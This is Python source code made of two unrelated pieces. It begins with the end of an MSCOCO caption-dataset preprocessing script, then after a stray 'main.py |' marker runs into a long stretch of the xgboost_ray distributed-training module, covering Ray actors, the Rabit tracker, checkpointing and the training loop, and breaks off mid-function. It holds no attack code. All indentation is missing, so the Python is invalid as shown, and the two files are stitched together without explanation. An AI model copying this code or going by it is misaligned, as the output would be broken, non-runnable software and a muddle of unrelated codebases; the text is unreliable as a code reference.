# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
main.py | from typing import Tuple, Dict, Any, List, Optional, Callable, Union, Sequence
from dataclasses import dataclass, field
from distutils.version import LooseVersion
import functools
import multiprocessing
import os
import pickle
import time
import threading
import warnings
import re
import inspect
import numpy as np
import pandas as pd
from xgboost_ray.xgb import xgboost as xgb
from xgboost.core import XGBoostError
try:
from xgboost.core import EarlyStopException
except ImportError:
class EarlyStopException(XGBoostError):
pass
from xgboost_ray.callback import DistributedCallback, \
DistributedCallbackContainer
from xgboost_ray.compat import TrainingCallback, RabitTracker, LEGACY_CALLBACK
try:
import ray
from ray import logger
from ray.exceptions import RayActorError, RayTaskError
from ray.actor import ActorHandle
from ray.util import get_node_ip_address, placement_group
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.util.placement_group import PlacementGroup, \
remove_placement_group, get_current_placement_group
from xgboost_ray.util import Event, Queue, MultiActorTask, \
force_on_current_node
if LooseVersion(ray.__version__) >= LooseVersion("1.5.0"):
# https://github.com/ray-project/ray/pull/16437
DEFAULT_PG = "default"
else:
DEFAULT_PG = None
RAY_INSTALLED = True
except ImportError:
ray = get_node_ip_address = Queue = Event = ActorHandle = logger = None
def PublicAPI(f):
@functools.wraps(f)
def inner_f(*args, **kwargs):
return f(*args, **kwargs)
return inner_f
DeveloperAPI = PublicAPI
RAY_INSTALLED = False
from xgboost_ray.tune import _try_add_tune_callback, _get_tune_resources, \
TUNE_USING_PG, is_session_enabled
from xgboost_ray.matrix import RayDMatrix, combine_data, \
RayDeviceQuantileDMatrix, RayDataIter, concat_dataframes, \
LEGACY_MATRIX
from xgboost_ray.session import init_session, put_queue, \
set_session_queue
def _get_environ(item: str, old_val: Any):
env_var = f"RXGB_{item}"
new_val = old_val
if env_var in os.environ:
new_val_str = os.environ.get(env_var)
if isinstance(old_val, bool):
new_val = bool(int(new_val_str))
elif isinstance(old_val, int):
new_val = int(new_val_str)
elif isinstance(old_val, float):
new_val = float(new_val_str)
else:
new_val = new_val_str
return new_val
@dataclass
class _XGBoostEnv:
# Whether to use SPREAD placement group strategy for training.
USE_SPREAD_STRATEGY: bool = True
# How long to wait for placement group creation before failing.
PLACEMENT_GROUP_TIMEOUT_S: int = 100
# Status report frequency when waiting for initial actors
# and during training
STATUS_FREQUENCY_S: int = 30
# If restarting failed actors is disabled
ELASTIC_RESTART_DISABLED: bool = False
# How often to check for new available resources
ELASTIC_RESTART_RESOURCE_CHECK_S: int = 30
# How long to wait before triggering a new start of the training loop
# when new actors become available
ELASTIC_RESTART_GRACE_PERIOD_S: int = 10
def __getattribute__(self, item):
old_val = super(_XGBoostEnv, self).__getattribute__(item)
new_val = _get_environ(item, old_val)
if new_val != old_val:
setattr(self, item, new_val)
return super(_XGBoostEnv, self).__getattribute__(item)
ENV = _XGBoostEnv()
xgboost_version = xgb.__version__ if xgb else "0.0.0"
LEGACY_WARNING = (
f"You are using `xgboost_ray` with a legacy XGBoost version "
f"(version {xgboost_version}). While we try to support "
f"older XGBoost versions, please note that this library is only "
f"fully tested and supported for XGBoost >= 1.4. Please consider "
f"upgrading your XGBoost version (`pip install -U xgboost`).")
# XGBoost version as an int tuple for comparisions
XGBOOST_VERSION_TUPLE = tuple(
int(x) for x in re.sub(r"[^\.0-9]", "", xgboost_version).split("."))
class RayXGBoostTrainingError(RuntimeError):
"""Raised from RayXGBoostActor.train() when the local xgb.train function
did not complete."""
pass
class RayXGBoostTrainingStopped(RuntimeError):
"""Raised from RayXGBoostActor.train() when training was deliberately
stopped."""
pass
class RayXGBoostActorAvailable(RuntimeError):
"""Raise from `_update_scheduled_actor_states()` when new actors become
available in elastic training"""
pass
def _assert_ray_support():
if not RAY_INSTALLED:
raise ImportError(
"Ray needs to be installed in order to use this module. "
"Try: `pip install ray`")
def _maybe_print_legacy_warning():
if LEGACY_MATRIX or LEGACY_CALLBACK:
warnings.warn(LEGACY_WARNING)
def _is_client_connected() -> bool:
try:
return ray.util.client.ray.is_connected()
except Exception:
return False
class _RabitTrackerCompatMixin:
"""Fallback calls to legacy terminology"""
def accept_workers(self, n_workers: int):
return self.accept_slaves(n_workers)
def worker_envs(self):
return self.slave_envs()
class _RabitTracker(RabitTracker, _RabitTrackerCompatMixin):
"""
This method overwrites the xgboost-provided RabitTracker to switch
from a daemon thread to a multiprocessing Process. This is so that
we are able to terminate/kill the tracking process at will.
"""
def start(self, nworker):
# TODO: refactor RabitTracker to support spawn process creation.
# In python 3.8, spawn is used as default process creation on macOS.
# But spawn doesn't work because `run` is not pickleable.
# For now we force the start method to use fork.
multiprocessing.set_start_method("fork", force=True)
def run():
self.accept_workers(nworker)
self.thread = multiprocessing.Process(target=run, args=())
self.thread.start()
def _start_rabit_tracker(num_workers: int):
"""Start Rabit tracker. The workers connect to this tracker to share
their results.
The Rabit tracker is the main process that all local workers connect to
to share their weights. When one or more actors die, we want to
restart the Rabit tracker, too, for two reasons: First we don't want to
be potentially stuck with stale connections from old training processes.
Second, we might restart training with a different number of actors, and
for that we would have to restart the tracker anyway.
To do this we start the Tracker in its own subprocess with its own PID.
We can use this process then to specifically kill/terminate the tracker
process in `_stop_rabit_tracker` without touching other functionality.
"""
host = get_node_ip_address()
env = {"DMLC_NUM_WORKER": num_workers}
rabit_tracker = _RabitTracker(host, num_workers)
# Get tracker Host + IP
env.update(rabit_tracker.worker_envs())
rabit_tracker.start(num_workers)
logger.debug(
f"Started Rabit tracker process with PID {rabit_tracker.thread.pid}")
return rabit_tracker.thread, env
def _stop_rabit_tracker(rabit_process: multiprocessing.Process):
logger.debug(f"Stopping Rabit process with PID {rabit_process.pid}")
rabit_process.join(timeout=5)
rabit_process.terminate()
class _RabitContext:
"""This context is used by local training actors to connect to the
Rabit tracker.
Args:
actor_id (str): Unique actor ID
args (list): Arguments for Rabit initialisation. These are
environment variables to configure Rabit clients.
"""
def __init__(self, actor_id, args):
self.args = args
self.args.append(("DMLC_TASK_ID=[xgboost.ray]:" + actor_id).encode())
def __enter__(self):
xgb.rabit.init(self.args)
def __exit__(self, *args):
xgb.rabit.finalize()
def _ray_get_actor_cpus():
# Get through resource IDs
resource_ids = ray.worker.get_resource_ids()
if "CPU" in resource_ids:
return sum(cpu[1] for cpu in resource_ids["CPU"])
return None
def _ray_get_cluster_cpus():
return ray.cluster_resources().get("CPU", None)
def _get_min_node_cpus():
max_node_cpus = min(
node.get("Resources", {}).get("CPU", 0.0) for node in ray.nodes()
if node.get("Alive", False))
return max_node_cpus if max_node_cpus > 0.0 else 1.0
def _set_omp_num_threads():
ray_cpus = _ray_get_actor_cpus()
if ray_cpus:
os.environ["OMP_NUM_THREADS"] = str(int(ray_cpus))
else:
if "OMP_NUM_THREADS" in os.environ:
del os.environ["OMP_NUM_THREADS"]
return int(float(os.environ.get("OMP_NUM_THREADS", "0.0")))
def _get_dmatrix(data: RayDMatrix, param: Dict) -> xgb.DMatrix:
if not LEGACY_MATRIX and isinstance(data, RayDeviceQuantileDMatrix):
# If we only got a single data shard, create a list so we can
# iterate over it
if not isinstance(param["data"], list):
param["data"] = [param["data"]]
if not isinstance(param["label"], list):
param["label"] = [param["label"]]
if not isinstance(param["weight"], list):
param["weight"] = [param["weight"]]
if not isinstance(param["qid"], list):
param["qid"] = [param["qid"]]
if not isinstance(param["data"], list):
param["base_margin"] = [param["base_margin"]]
param["label_lower_bound"] = [None]
param["label_upper_bound"] = [None]
dm_param = {
"feature_names": data.feature_names,
"feature_types": data.feature_types,
"missing": data.missing,
}
param.update(dm_param)
it = RayDataIter(**param)
matrix = xgb.DeviceQuantileDMatrix(it, **dm_param)
else:
if isinstance(param["data"], list):
dm_param = {
"data": concat_dataframes(param["data"]),
"label": concat_dataframes(param["label"]),
"weight": concat_dataframes(param["weight"]),
"qid": concat_dataframes(param["qid"]),
"base_margin": concat_dataframes(param["base_margin"]),
"label_lower_bound": concat_dataframes(
param["label_lower_bound"]),
"label_upper_bound": concat_dataframes(
param["label_upper_bound"]),
}
param.update(dm_param)
ll = param.pop("label_lower_bound", None)
lu = param.pop("label_upper_bound", None)
if LEGACY_MATRIX:
param.pop("base_margin", None)
param.pop("qid", None)
matrix = xgb.DMatrix(**param)
if not LEGACY_MATRIX:
matrix.set_info(label_lower_bound=ll, label_upper_bound=lu)
data.update_matrix_properties(matrix)
return matrix
@PublicAPI(stability="beta")
@dataclass
class RayParams:
"""Parameters to configure Ray-specific behavior.
Args:
num_actors (int): Number of parallel Ray actors.
cpus_per_actor (int): Number of CPUs to be used per Ray actor.
gpus_per_actor (int): Number of GPUs to be used per Ray actor.
resources_per_actor (Optional[Dict]): Dict of additional resources
required per Ray actor.
elastic_training (bool): If True, training will continue with
fewer actors if an actor fails. Default False.
max_failed_actors (int): If `elastic_training` is True, this
specifies the maximum number of failed actors with which
we still continue training.
max_actor_restarts (int): Number of retries when Ray actors fail.
Defaults to 0 (no retries). Set to -1 for unlimited retries.
checkpoint_frequency (int): How often to save checkpoints. Defaults
to ``5`` (every 5th iteration).
"""
# Actor scheduling
num_actors: int = 0
cpus_per_actor: int = 0
gpus_per_actor: int = -1
resources_per_actor: Optional[Dict] = None
# Fault tolerance
elastic_training: bool = False
max_failed_actors: int = 0
max_actor_restarts: int = 0
checkpoint_frequency: int = 5
# Distributed callbacks
distributed_callbacks: Optional[List[DistributedCallback]] = None
def get_tune_resources(self):
"""Return the resources to use for xgboost_ray training with Tune."""
if self.cpus_per_actor <= 0 or self.num_actors <= 0:
raise ValueError("num_actors and cpus_per_actor both must be "
"greater than 0.")
return _get_tune_resources(
num_actors=self.num_actors,
cpus_per_actor=self.cpus_per_actor,
gpus_per_actor=max(0, self.gpus_per_actor),
resources_per_actor=self.resources_per_actor)
@dataclass
class _Checkpoint:
iteration: int = 0
value: Optional[bytes] = None
def _validate_ray_params(ray_params: Union[None, RayParams, dict]) \
-> RayParams:
if ray_params is None:
ray_params = RayParams()
elif isinstance(ray_params, dict):
ray_params = RayParams(**ray_params)
elif not isinstance(ray_params, RayParams):
raise ValueError(
f"`ray_params` must be a `RayParams` instance, a dict, or None, "
f"but it was {type(ray_params)}."
f"\nFIX THIS preferably by passing a `RayParams` instance as "
f"the `ray_params` parameter.")
if ray_params.num_actors <= 0:
raise ValueError(
"The `num_actors` parameter is set to 0. Please always specify "
"the number of distributed actors you want to use."
"\nFIX THIS by passing a `RayParams(num_actors=X)` argument "
"to your call to xgboost_ray.")
elif ray_params.num_actors < 2:
warnings.warn(
f"`num_actors` in `ray_params` is smaller than 2 "
f"({ray_params.num_actors}). XGBoost will NOT be distributed!")
return ray_params
@DeveloperAPI
class RayXGBoostActor:
"""Remote Ray XGBoost actor class.
This remote actor handles local training and prediction of one data
shard. It initializes a Rabit context, thus connecting to the Rabit
all-reduce ring, and initializes local training, sending updates
to other workers.
The actor with rank 0 also checkpoints the model periodically and
sends the checkpoint back to the driver.
Args:
rank (int): Rank of the actor. Must be ``0 <= rank < num_actors``.
num_actors (int): Total number of actors.
queue (Queue): Ray queue to communicate with main process.
checkpoint_frequency (int): How often to store checkpoints. Defaults
to ``5``, saving checkpoints every 5 boosting rounds.
"""
def __init__(
self,
rank: int,
num_actors: int,
queue: Optional[Queue] = None,
stop_event: Optional[Event] = None,
checkpoint_frequency: int = 5,
distributed_callbacks: Optional[List[DistributedCallback]] = None):
self.queue = queue
init_session(rank, self.queue)
self.rank = rank
self.num_actors = num_actors
self.checkpoint_frequency = checkpoint_frequency
self._data: Dict[RayDMatrix, xgb.DMatrix] = {}
self._local_n: Dict[RayDMatrix, int] = {}
self._stop_event = stop_event
self._distributed_callbacks = DistributedCallbackContainer(
distributed_callbacks)
self._distributed_callbacks.on_init(self)
_set_omp_num_threads()
logger.debug(f"Initialized remote XGBoost actor with rank {self.rank}")
def set_queue(self, queue: Queue):
self.queue = queue
set_session_queue(self.queue)
def set_stop_event(self, stop_event: Event):
self._stop_event = stop_event
def _get_stop_event(self):
return self._stop_event
def pid(self):
"""Get process PID. Used for checking if still alive"""
return os.getpid()
def ip(self):
"""Get node IP address."""
return get_node_ip_address()
def _save_checkpoint_callback(self):
"""Send checkpoints to driver"""
this = self
class _SaveInternalCheckpointCallback(TrainingCallback):
def after_iteration(self, model, epoch, evals_log):
if xgb.rabit.get_rank() == 0 and \
epoch % this.checkpoint_frequency == 0:
put_queue(_Checkpoint(epoch, pickle.dumps(model)))
def after_training(self, model):
if xgb.rabit.get_rank() == 0:
put_queue(_Checkpoint(-1, pickle.dumps(model)))
return model
return _SaveInternalCheckpointCallback()
def _stop_callback(self):
"""Stop if event is set"""
this = self
# Keep track of initial stop event. Since we're training in a thread,
# the stop event might be overwritten, which should he handled
# as if the previous stop event was set.
initial_stop_event = self._stop_event
class _StopCallback(TrainingCallback):
def after_iteration(self, model, epoch, evals_log):
try:
if this._stop_event.is_set() or \
this._get_stop_event() is not initial_stop_event:
if LEGACY_CALLBACK:
raise EarlyStopException(epoch)
# Returning True stops training
return True
except RayActorError:
if LEGACY_CALLBACK:
raise EarlyStopException(epoch)
return True
return _StopCallback()
def load_data(self, data: RayDMatrix):
if data in self._data:
return
self._distributed_callbacks.before_data_loading(self, data)
param = data.get_data(self.rank, self.num_actors)
if isinstance(param["data"], list):
self._local_n[data] = sum(len(a) for a in param["data"])
else:
self._local_n[data] = len(param["data"])
self._data[data] = param
self._distributed_callbacks.after_data_loading(self, data)
def train(self, rabit_args: List[str], return_bst: bool,
params: Dict[str, Any], dtrain: RayDMatrix,
evals: Tuple[RayDMatrix, str], *args,
**kwargs) -> Dict[str, Any]:
self._distributed_callbacks.before_train(self)
num_threads = _set_omp_num_threads()
local_params = params.copy()
if "xgb_model" in kwargs:
if isinstance(kwargs["xgb_model"], bytes):
# bytearray type gets lost in remote actor call
kwargs["xgb_model"] = bytearray(kwargs["xgb_model"])
if "nthread" not in local_params and "n_jobs" not in local_params:
if num_threads > 0:
local_params["nthread"] = num_threads
local_params["n_jobs"] = num_threads
else:
local_params["nthread"] = sum(
num
for _, num in ray.worker.get_resource_ids().get("CPU", []))
local_params["n_jobs"] = local_params["nthread"]
if dtrain not in self._data:
self.load_data(dtrain)
for deval, _name in evals:
if deval not in self._data:
self.load_data(deval)
evals_result = dict()
if "callbacks" in kwargs:
callbacks = kwargs["callbacks"] or []
else:
callbacks = []
callbacks.append(self._save_checkpoint_callback())
callbacks.append(self._stop_callback())
kwargs["callbacks"] = callbacks
result_dict = {}
error_dict = {}
# We run xgb.train in a thread to be able to react to the stop event.
def _train():
try:
with _RabitContext(str(id(self)), rabit_args):
local_dtrain = _get_dmatrix(dtrain, self._data[dtrain])
if not local_dtrain.get_label().size:
raise RuntimeError(
"Training data has no label set. Please make sure "
"to set the `label` argument when initializing "
"`RayDMatrix()` for data you would like "
"to train on.")
local_evals = []
for deval, name in evals:
local_evals.append((_get_dmatrix(
deval, self._data[deval]), name))
if LEGACY_CALLBACK:
for xgb_callback in kwargs.get("callbacks", []):
if isinstance(xgb_callback, TrainingCallback):
xgb_callback.before_training(None)
bst = xgb.train(
local_params,
local_dtrain,
*args,
evals=local_evals,
evals_result=evals_result,
**kwargs)
if LEGACY_CALLBACK:
for xgb_callback in kwargs.get("callbacks", []):
if isinstance(xgb_callback, TrainingCallback):
xgb_callback.after_training(bst)
result_dict.update({
"bst": bst,
"evals_result": evals_result,
"train_n": self._local_n[dtrain]
})
except EarlyStopException:
# Usually this should be caught by XGBoost core.
# Silent fail, will be raised as RayXGBoostTrainingStopped.
return
except XGBoostError as e:
error_dict.update({"exception": e})
return
thread = threading.Thread(target=_train)
thread.daemon = True
thread.start()
while thread.is_alive():
thread.join(timeout=0)
if self._stop_event.is_set():
raise RayXGBoostTrainingStopped("Training was interrupted.")
time.sleep(0.1)
if not result_dict:
raise_from = error_dict.get("exception", None)
raise RayXGBoostTrainingError("Training failed.") from raise_from
thread.join()
self._distributed_callbacks.after_train(self, result_dict)
if not return_bst:
result_dict.pop("bst", None)
return result_dict
def predict(self, model: xgb.Booster, data: RayDMatrix, **kwargs):
self._distributed_callbacks.before_predict(self)
_set_omp_num_threads()
if data not in self._data:
self.load_data(data)
local_data = _get_dmatrix(data, self._data[data])
predictions = model.predict(local_data, **kwargs)
if predictions.ndim == 1:
callback_predictions = pd.Series(predictions)
else:
callback_predictions = pd.DataFrame(predictions)
self._distributed_callbacks.after_predict(self, callback_predictions)
return predictions
@ray.remote
class _RemoteRayXGBoostActor(RayXGBoostActor):
pass
class _PrepareActorTask(MultiActorTask):
def __init__(self, actor: ActorHandle, queue: Queue, stop_event: Event,
load_data: List[RayDMatrix]):
futures = []
futures.append(actor.set_queue.remote(queue))
futures.append(actor.set_stop_event.remote(stop_event))
for data in load_data:
futures.append(actor.load_data.remote(data))
super(_PrepareActorTask, self).__init__(futures)
def _autodetect_resources(ray_params: RayParams,
use_tree_method: bool = False) -> Tuple[int, int]:
gpus_per_actor = ray_params.gpus_per_actor
cpus_per_actor = ray_params.cpus_per_actor
# Automatically set gpus_per_actor if left at the default value
if gpus_per_actor == -1:
gpus_per_actor = 0
if use_tree_method:
gpus_per_actor = 1
# Automatically set cpus_per_actor if left at the default value
# Will be set to the number of cluster CPUs divided by the number of
# actors, bounded by the minimum number of CPUs across actors nodes.
if cpus_per_actor <= 0:
cluster_cpus = _ray_get_cluster_cpus() or 1
cpus_per_actor = max(
1,
min(
int(_get_min_node_cpus() or 1),
int(cluster_cpus // ray_params.num_actors)))
return cpus_per_actor, gpus_per_actor
def _create_actor(
rank: int,
num_actors: int,
num_cpus_per_actor: int,
num_gpus_per_actor: int,
resources_per_actor: Optional[Dict] = None,
placement_group: Optional[PlacementGroup] = None,
queue: Optional[Queue] = None,
checkpoint_frequency: int = 5,
distributed_callbacks: Optional[Sequence[DistributedCallback]] = None
) -> ActorHandle:
# Send DEFAULT_PG here, which changed in Ray >= 1.5.0
# If we send `None`, this will ignore the parent placement group and
# lead to errors e.g. when used within Ray Tune
return _RemoteRayXGBoostActor.options(
num_cpus=num_cpus_per_actor,
num_gpus=num_gpus_per_actor,
resources=resources_per_actor,
placement_group_capture_child_tasks=True,
placement_group=placement_group or DEFAULT_PG).remote(
rank=rank,
num_actors=num_actors,
queue=queue,
checkpoint_frequency=checkpoint_frequency,
distributed_callbacks=distributed_callbacks)
def _trigger_data_load(actor, dtrain, evals):
wait_load = [actor.load_data.remote(dtrain)]
for deval, _name in evals:
wait_load.append(actor.load_data.remote(deval))
return wait_load
def _handle_queue(queue: Queue, checkpoint: _Checkpoint,
callback_returns: Dict):
"""Handle results obtained from workers through the remote Queue object.
Remote actors supply these results via the
``xgboost_ray.session.put_queue()`` function. These can be:
- Callables. These will be called immediately with no arguments.
- ``_Checkpoint`` objects. These will update the latest checkpoint
object on the driver.
- Any other type. These will be appended to an actor rank-specific
``callback_returns`` dict that will be written to the
``additional_returns`` dict of the :func:`train() <train>` method.
"""
while not queue.empty():
(actor_rank, item) = queue.get()
if isinstance(item, Callable):
item()
elif isinstance(item, _Checkpoint):
checkpoint.__dict__.update(item.__dict__)
else:
callback_returns[actor_rank].append(item)
def _shutdown(actors: List[ActorHandle],
pending_actors: Optional[Dict[int, Tuple[
ActorHandle, _PrepareActorTask]]] = None,
queue: Optional[Queue] = None,
event: Optional[Event] = None,
placement_group: Optional[PlacementGroup] = None,
force: bool = False):
alive_actors = [a for a in actors if a is not None]
if pending_actors:
alive_actors += [a for (a, _) in pending_actors.values()]
if force:
for actor in alive_actors:
ray.kill(actor)
else:
done_refs = [a.__ray_terminate__.remote() for a in alive_actors]
# Wait 5 seconds for actors to die gracefully.
done, not_done = ray.wait(done_refs, timeout=5)
if not_done:
# If all actors are not able to die gracefully, then kill them.
for actor in alive_actors:
ray.kill(actor)
for i in range(len(actors)):
actors[i] = None
if queue:
queue.shutdown()
if event:
event.shutdown()
if placement_group:
remove_placement_group(placement_group)
def _create_placement_group(cpus_per_actor, gpus_per_actor,
resources_per_actor, num_actors, strategy):
resources_per_bundle = {"CPU": cpus_per_actor, "GPU": gpus_per_actor}
extra_resources_per_bundle = {} if resources_per_actor is None else \
resources_per_actor
# Create placement group for training worker colocation.
bundles = [{
**resources_per_bundle,
**extra_resources_per_bundle
} for _ in range(num_actors)]
pg = placement_group(bundles, strategy=strategy)
# Wait for placement group to get created.
logger.debug("Waiting for placement group to start.")
ready, _ = ray.wait([pg.ready()], timeout=ENV.PLACEMENT_GROUP_TIMEOUT_S)
if ready:
logger.debug("Placement group has started.")
else:
raise TimeoutError("Placement group creation timed out. Make sure "
"your cluster either has enough resources or use "
"an autoscaling cluster. Current resources "
"available: {}, resources requested by the "
"placement group: {}".format(
ray.available_resources(), pg.bundle_specs))
return pg
def _create_communication_processes(added_tune_callback: bool = False):
# Create Queue and Event actors and make sure to colocate with driver node.
node_ip = get_node_ip_address()
# Have to explicitly set num_cpus to 0.
placement_option = {"num_cpus": 0}
if added_tune_callback and TUNE_USING_PG:
# If Tune is using placement groups, then we force Queue and
# StopEvent onto same bundle as the Trainable.
# This forces all 3 to be on the same node.
current_pg = get_current_placement_group()
if current_pg is None:
# This means the user is not using Tune PGs after all -
# e.g. via setting an environment variable.
placement_option.update({"resources": {f"node:{node_ip}": 0.01}})
else:
placement_option.update({
"placement_group": current_pg,
"placement_group_bundle_index": 0
})
else:
placement_option.update({"resources": {f"node:{node_ip}": 0.01}})
queue = Queue(actor_options=placement_option) # Queue actor
stop_event = Event(actor_options=placement_option) # Stop event actor
return queue, stop_event
def _validate_kwargs_for_func(kwargs: Dict[str, Any], func: Callable,
func_name: str):
"""Raise exception if kwargs are not valid for a given function."""
sig = inspect.signature(func)
try:
sig.bind_partial(**kwargs)
except TypeError as e:
# Try to find set of invalid kwargs
valid_keys = inspect.getfullargspec(func)[0]
invalid_kwargs = [k for k in kwargs if k not in valid_keys]
raise TypeError(
f"Got invalid keyword arguments to be passed to `{func_name}`. "
f"Please check these arguments: {invalid_kwargs}") from e
@dataclass
class _TrainingState:
actors: List[Optional[ActorHandle]]
queue: Queue
stop_event: Event
checkpoint: _Checkpoint
additional_results: Dict
training_started_at: float = 0.
placement_group: Optional[PlacementGroup] = None
failed_actor_ranks: set = field(default_factory=set)
# Last time we checked resources to schedule new actors
last_resource_check_at: float = 0
pending_actors: Dict[int, Tuple[ActorHandle, _PrepareActorTask]] = field(
default_factory=dict)
restart_training_at: Optional[float] = None
def _train(params: Dict,
dtrain: RayDMatrix,
*args,
evals=(),
ray_params: RayParams,
cpus_per_actor: int,
gpus_per_actor: int,
_training_state: _TrainingState,
**kwargs) -> Tuple[xgb.Booster, Dict, Dict]:
"""This is the local train function wrapped by :func:`train() <train>`.
This function can be thought of one invocation of a multi-actor xgboost
training run. It starts the required number of actors, triggers data
loading, collects the results, and handles (i.e. registers) actor failures
- but it does not handle fault tolerance or general training setup.
Generally, this function is called one or multiple times by the
:func:`train() <train>` function. It is called exactly once if no
errors occur. It is called more than once if errors occurred (e.g. an
actor died) and failure handling is enabled.
"""
from xgboost_ray.elastic import _maybe_schedule_new_actors, \
_update_scheduled_actor_states, _get_actor_alive_status
# Un-schedule possible scheduled restarts
_training_state.restart_training_at = None
if "nthread" in params or "n_jobs" in params:
if ("nthread" in params and params["nthread"] > cpus_per_actor) or (
"n_jobs" in params and params["n_jobs"] > cpus_per_actor):
raise ValueError(
"Specified number of threads greater than number of CPUs. "
"\nFIX THIS by passing a lower value for the `nthread` "
"parameter or a higher number for `cpus_per_actor`.")
else:
params["nthread"] = cpus_per_actor
params["n_jobs"] = cpus_per_actor
# This is a callback that handles actor failures.
# We identify the rank of the failed actor, add this to a set of
# failed actors (which we might want to restart later), and set its
# entry in the actor list to None.
def handle_actor_failure(actor_id):
rank = _training_state.actors.index(actor_id)
_training_state.failed_actor_ranks.add(rank)
_training_state.actors[rank] = None
# Here we create new actors. In the first invocation of _train(), this
# will be all actors. In future invocations, this may be less than
# the num_actors setting, depending on the failure mode.
newly_created = 0
for i in list(_training_state.failed_actor_ranks):
if _training_state.actors[i] is not None:
raise RuntimeError(
f"Trying to create actor with rank {i}, but it already "
f"exists.")
actor = _create_actor(
rank=i,
num_actors=ray_params.num_actors,
num_cpus_per_actor=cpus_per_actor,
num_gpus_per_actor=gpus_per_actor,
resources_per_actor=ray_params.resources_per_actor,
placement_group=_training_state.placement_group,
queue=_training_state.queue,
checkpoint_frequency=ray_params.checkpoint_frequency,
distributed_callbacks=ray_params.distributed_callbacks)
# Set actor entry in our list
_training_state.actors[i] = actor
# Remove from this set so it is not created again
_training_state.failed_actor_ranks.remove(i)
newly_created += 1
alive_actors = sum(1 for a in _training_state.actors if a is not None)
logger.info(f"[RayXGBoost] Created {newly_created} new actors "
f"({alive_actors} total actors). Waiting until actors "
f"are ready for training.")
# For distributed datasets (e.g. Modin), this will initialize
# (and fix) the assignment of data shards to actor ranks
dtrain.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
dtrain.assign_shards_to_actors(_training_state.actors)
for deval, _ in evals:
deval.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
deval.assign_shards_to_actors(_training_state.actors)
load_data = [dtrain] + [eval[0] for eval in evals]
prepare_actor_tasks = [
_PrepareActorTask(
actor,
# Maybe we got a new Queue actor, so send it to all actors.
queue=_training_state.queue,
# Maybe we got a new Event actor, so send it to all actors.
stop_event=_training_state.stop_event,
# Trigger data loading
load_data=load_data) for actor in _training_state.actors
if actor is not None
]
start_wait = time.time()
last_status = start_wait
try:
# Construct list before calling any() to force evaluation
ready_states = [task.is_ready() for task in prepare_actor_tasks]
while not all(ready_states):
if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
wait_time = time.time() - start_wait
logger.info(f"Waiting until actors are ready "
f"({wait_time:.0f} seconds passed).")
last_status = time.time()
time.sleep(0.1)
ready_states = [task.is_ready() for task in prepare_actor_tasks]
except Exception as exc:
_training_state.stop_event.set()
_get_actor_alive_status(_training_state.actors, handle_actor_failure)
raise RayActorError from exc
logger.info("[RayXGBoost] Starting XGBoost training.")
# Start Rabit tracker for gradient sharing
rabit_process, env = _start_rabit_tracker(alive_actors)
rabit_args = [("%s=%s" % item).encode() for item in env.items()]
# Load checkpoint if we have one. In that case we need to adjust the
# number of training rounds.
if _training_state.checkpoint.value:
kwargs["xgb_model"] = pickle.loads(_training_state.checkpoint.value)
if _training_state.checkpoint.iteration == -1:
# -1 means training already finished.
logger.error(
"Trying to load continue from checkpoint, but the checkpoint"
"indicates training already finished. Returning last"
"checkpointed model instead.")
return kwargs["xgb_model"], {}, _training_state.additional_results
# The callback_returns dict contains actor-rank indexed lists of
# results obtained through the `put_queue` function, usually
# sent via callbacks.
callback_returns = _training_state.additional_results.get(
"callback_returns")
if callback_returns is None:
callback_returns = [list() for _ in range(len(_training_state.actors))]
_training_state.additional_results[
"callback_returns"] = callback_returns
_training_state.training_started_at = time.time()
# Trigger the train function
live_actors = [
actor for actor in _training_state.actors if actor is not None
]
training_futures = [
actor.train.remote(
rabit_args,
i == 0, # return_bst
params,
dtrain,
evals,
*args,
**kwargs) for i, actor in enumerate(live_actors)
]
# Failure handling loop. Here we wait until all training tasks finished.
# If a training task fails, we stop training on the remaining actors,
# check which ones are still alive, and raise the error.
# The train() wrapper function will then handle the error.
start_wait = time.time()
last_status = start_wait
try:
not_ready = training_futures
while not_ready:
if _training_state.queue:
_handle_queue(
queue=_training_state.queue,
checkpoint=_training_state.checkpoint,
callback_returns=callback_returns)
if ray_params.elastic_training \
and not ENV.ELASTIC_RESTART_DISABLED:
_maybe_schedule_new_actors(
training_state=_training_state,
num_cpus_per_actor=cpus_per_actor,
num_gpus_per_actor=gpus_per_actor,
resources_per_actor=ray_params.resources_per_actor,
ray_params=ray_params,
load_data=load_data)
# This may raise RayXGBoostActorAvailable
_update_scheduled_actor_states(_training_state)
if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
wait_time = time.time() - start_wait
logger.info(f"Training in progress "
f"({wait_time:.0f} seconds since last restart).")
last_status = time.time()
ready, not_ready = ray.wait(
not_ready, num_returns=len(not_ready), timeout=1)
ray.get(ready)
# Get items from queue one last time
if _training_state.queue:
_handle_queue(
queue=_training_state.queue,
checkpoint=_training_state.checkpoint,
callback_returns=callback_returns)
# The inner loop should catch all exceptions
except Exception as exc:
logger.debug(f"Caught exception in training loop: {exc}")
# Stop all other actors from training
_training_state.stop_event.set()
# Check which actors are still alive
_get_actor_alive_status(_training_state.actors, handle_actor_failure)
# Todo: Try to fetch newer checkpoint, store in `_checkpoint`
# Shut down rabit
_stop_rabit_tracker(rabit_process)
raise RayActorError from exc
# Training is now complete.
# Stop Rabit tracking process
_stop_rabit_tracker(rabit_process)
# Get all results from all actors.
all_results: List[Dict[str, Any]] = ray.get(training_futures)
# All results should be the same because of Rabit tracking. But only
# the first one actually returns its bst object.
bst = all_results[0]["bst"]
evals_result = all_results[0]["evals_result"]
if callback_returns:
_training_state.additional_results[
"callback_returns"] = callback_returns
